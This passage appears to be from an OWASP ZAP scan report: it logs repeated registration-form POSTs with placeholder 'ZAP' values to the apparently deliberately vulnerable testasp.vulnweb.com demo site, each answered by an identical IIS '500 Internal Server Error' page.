<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
